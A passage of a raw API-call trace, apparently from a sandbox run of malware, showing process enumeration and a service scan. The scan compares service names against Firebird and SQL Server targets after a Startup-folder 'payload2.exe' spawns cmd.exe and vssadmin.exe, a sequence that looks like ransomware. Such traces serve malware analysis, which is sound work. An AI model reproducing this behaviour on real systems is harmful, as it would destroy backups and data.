pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.150] lstrlenW (lpString="svchost.exe") returned 11 [0054.151] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.151] lstrlenW (lpString="svchost.exe") returned 11 [0054.151] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.152] lstrlenW (lpString="svchost.exe") returned 11 [0054.152] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.152] lstrlenW (lpString="svchost.exe") returned 11 [0054.152] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.153] lstrlenW (lpString="svchost.exe") returned 11 [0054.153] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0054.154] lstrlenW (lpString="audiodg.exe") returned 11 [0054.154] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.155] lstrlenW (lpString="svchost.exe") returned 11 [0054.155] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.156] lstrlenW (lpString="svchost.exe") returned 11 [0054.156] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0054.156] lstrlenW (lpString="dwm.exe") returned 7 [0054.156] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0054.158] lstrlenW (lpString="explorer.exe") returned 12 [0054.158] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0054.159] lstrlenW (lpString="spoolsv.exe") returned 11 [0054.159] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0054.159] lstrlenW (lpString="taskhost.exe") returned 12 [0054.159] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.160] lstrlenW (lpString="svchost.exe") returned 11 [0054.160] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0054.161] lstrlenW (lpString="taskeng.exe") returned 11 [0054.161] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0054.161] lstrlenW (lpString="taskhost.exe") returned 12 [0054.161] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x788, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="challenging.exe")) returned 1 [0054.162] lstrlenW (lpString="challenging.exe") returned 15 [0054.162] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pgp prix.exe")) returned 1 [0054.163] lstrlenW (lpString="pgp prix.exe") returned 12 [0054.163] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="user-reno.exe")) returned 1 [0054.163] lstrlenW (lpString="user-reno.exe") returned 13 [0054.163] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="aggregate.exe")) returned 1 [0054.164] lstrlenW (lpString="aggregate.exe") returned 13 [0054.164] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dressed.exe")) returned 1 [0054.165] lstrlenW (lpString="dressed.exe") returned 11 [0054.165] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="accounts evaluated jr.exe")) returned 1 [0054.187] lstrlenW (lpString="accounts evaluated jr.exe") returned 25 [0054.187] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vulnerability_joined_liechtenstein.exe")) returned 1 [0054.188] lstrlenW (lpString="vulnerability_joined_liechtenstein.exe") returned 38 [0054.189] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="developing.exe")) returned 1 [0054.190] lstrlenW (lpString="developing.exe") returned 14 [0054.190] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="supported.exe")) returned 1 [0054.191] lstrlenW (lpString="supported.exe") returned 13 [0054.191] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="girlstionselect.exe")) returned 1 [0054.193] lstrlenW (lpString="girlstionselect.exe") returned 19 [0054.193] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="employedboysdesktop.exe")) returned 1 [0054.195] lstrlenW (lpString="employedboysdesktop.exe") returned 23 [0054.195] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="clay_enquiry_thee.exe")) returned 1 [0054.195] lstrlenW (lpString="clay_enquiry_thee.exe") returned 21 [0054.195] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="eating.exe")) returned 1 [0054.196] lstrlenW (lpString="eating.exe") returned 10 [0054.196] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="nh_protected.exe")) returned 1 [0054.197] lstrlenW (lpString="nh_protected.exe") returned 16 [0054.197] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vulnerability.exe")) returned 1 [0054.197] lstrlenW (lpString="vulnerability.exe") returned 17 [0054.197] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="incidentoceaneast.exe")) returned 1 [0054.199] lstrlenW (lpString="incidentoceaneast.exe") returned 21 [0054.199] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ment_lo_animation.exe")) returned 1 [0054.204] lstrlenW (lpString="ment_lo_animation.exe") returned 21 [0054.204] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="counters_config_prostate.exe")) returned 1 [0054.205] lstrlenW (lpString="counters_config_prostate.exe") returned 28 [0054.205] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="teethpichuntercrude.exe")) returned 1 [0054.205] lstrlenW (lpString="teethpichuntercrude.exe") returned 23 [0054.205] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x814, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0054.208] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0054.208] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe")) returned 1 [0054.209] lstrlenW (lpString="cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe") returned 65 [0054.209] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x9a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0054.209] lstrlenW (lpString="cmd.exe") returned 7 [0054.210] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0054.211] lstrlenW (lpString="conhost.exe") returned 11 [0054.211] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x9b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0054.212] lstrlenW (lpString="vssadmin.exe") returned 12 [0054.212] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xabc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0054.212] lstrlenW (lpString="VSSVC.exe") returned 9 [0054.212] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0054.213] lstrlenW (lpString="svchost.exe") returned 11 [0054.213] Process32NextW (in: hSnapshot=0x164, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0054.213] CloseHandle (hObject=0x164) returned 1 [0054.213] Sleep (dwMilliseconds=0x1f4) [0054.746] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x3940708 [0054.747] EnumServicesStatusExW (in: hSCManager=0x3940708, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0) returned 0 [0054.747] GetLastError () returned 0xea [0054.747] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x12c6) returned 0x3940ef0 [0054.747] EnumServicesStatusExW (in: hSCManager=0x3940708, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3940ef0, cbBufSize=0x12c6, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3940ef0, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0) returned 1 [0054.748] CloseServiceHandle (hSCObject=0x3940708) returned 1 [0054.748] lstrlenW (lpString="Appinfo") returned 7 [0054.748] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0054.748] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0054.748] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0054.748] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0054.748] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0054.748] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0054.748] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0054.748] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0054.748] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0054.748] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0054.748] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0054.748] lstrlenW (lpString="AudioSrv") returned 8 [0054.748] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0054.748] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0054.748] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0054.748] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0054.748] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0054.748] lstrlenW (lpString="BFE") returned 3 [0054.748] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0054.748] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0054.749] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0054.749] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0054.749] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0054.749] lstrlenW (lpString="CryptSvc") returned 8 [0054.749] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0054.749] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0054.749] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0054.749] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0054.749] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0054.749] lstrlenW (lpString="CscService") returned 10 [0054.749] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0054.749] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0054.749] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0054.749] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0054.749] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0054.749] lstrlenW (lpString="DcomLaunch") returned 10 [0054.749] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0054.749] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0054.749] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0054.749] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0054.749] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0054.749] lstrlenW (lpString="Dhcp") returned 4 [0054.749] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0054.749] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0054.749] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0054.749] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0054.749] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0054.749] lstrlenW (lpString="Dnscache") returned 8 [0054.749] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0054.749] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0054.749] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0054.749] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0054.749] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0054.749] lstrlenW (lpString="DPS") returned 3 [0054.749] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0054.749] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0054.749] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0054.750] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0054.750] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0054.750] lstrlenW (lpString="eventlog") returned 8 [0054.750] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0054.750] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0054.750] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0054.750] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0054.750] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0054.750] lstrlenW (lpString="EventSystem") returned 11 [0054.750] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0054.750] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0054.750] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0054.750] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0054.750] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0054.750] lstrlenW (lpString="gpsvc") returned 5 [0054.750] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0054.750] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0054.750] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0054.750] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0054.750] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0054.750] lstrlenW (lpString="iphlpsvc") returned 8 [0054.750] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0054.750] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0054.750] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0054.750] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0054.750] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0054.750] lstrlenW (lpString="LanmanServer") returned 12 [0054.750] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0054.750] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0054.750] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0054.750] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0054.750] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0054.750] lstrlenW (lpString="LanmanWorkstation") returned 17 [0054.750] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0054.750] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0054.750] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0054.750] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0054.751] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0054.751] lstrlenW (lpString="lmhosts") returned 7 [0054.751] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0054.751] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0054.751] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0054.751] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0054.751] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0054.751] lstrlenW (lpString="MMCSS") returned 5 [0054.751] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0054.751] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0054.751] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0054.751] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0054.751] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0054.751] lstrlenW (lpString="MpsSvc") returned 6 [0054.751] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0054.751] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0054.751] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0054.751] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0054.751] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0054.751] lstrlenW (lpString="Netman") returned 6 [0054.751] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0054.751] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0054.751] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0054.751] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0054.751] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0054.751] lstrlenW (lpString="netprofm") returned 8 [0054.751] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0054.751] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0054.751] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0054.751] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0054.751] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0054.751] lstrlenW (lpString="NlaSvc") returned 6 [0054.751] lstrcmpiW 